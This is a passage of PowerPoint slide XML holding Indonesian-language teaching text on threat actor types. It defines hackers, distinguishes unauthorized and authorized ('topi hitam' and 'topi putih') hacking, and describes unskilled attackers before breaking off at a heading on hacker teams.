              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peretas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Awalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>netral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mahir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kreativitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ilegal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Istilah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hitam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>putih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>putih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terampil</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terampil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerjanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terampil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peretas</a:t>
